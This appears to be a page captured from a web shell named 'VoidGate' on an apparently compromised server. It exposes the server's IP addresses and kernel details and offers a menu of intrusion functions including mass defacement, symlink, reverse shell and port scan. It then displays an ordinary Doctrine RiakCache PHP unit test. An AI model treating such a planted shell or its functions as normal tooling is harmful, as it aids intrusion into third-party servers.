ヤミRoot VoidGate
User / IP
:
216.73.216.33
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
vendor
/
doctrine
/
cache
/
tests
/
Doctrine
/
Tests
/
Common
/
Cache
/
Viewing: RiakCacheTest.php
<?php namespace Doctrine\Tests\Common\Cache; use Riak\Bucket; use Riak\Connection; use Riak\Exception; use Doctrine\Common\Cache\RiakCache; /** * RiakCache test * * @group Riak * @requires extension riak */ class RiakCacheTest extends CacheTest { /** * @var \Riak\Connection */ private $connection; /** * @var \Riak\Bucket */ private $bucket; protected function setUp() { try { $this->connection = new Connection('127.0.0.1', 8087); $this->bucket = new Bucket($this->connection, 'test'); } catch (Exception\RiakException $e) { $this->markTestSkipped('Cannot connect to Riak.'); } } /** * {@inheritdoc} */ public function testGetStats() { $cache = $this->_getCacheDriver(); $stats = $cache->getStats(); $this->assertNull($stats); } /** * Retrieve RiakCache instance. * * @return \Doctrine\Common\Cache\RiakCache */ protected function _getCacheDriver() { return new RiakCache($this->bucket); } }
Coded With 💗 by
0x6ick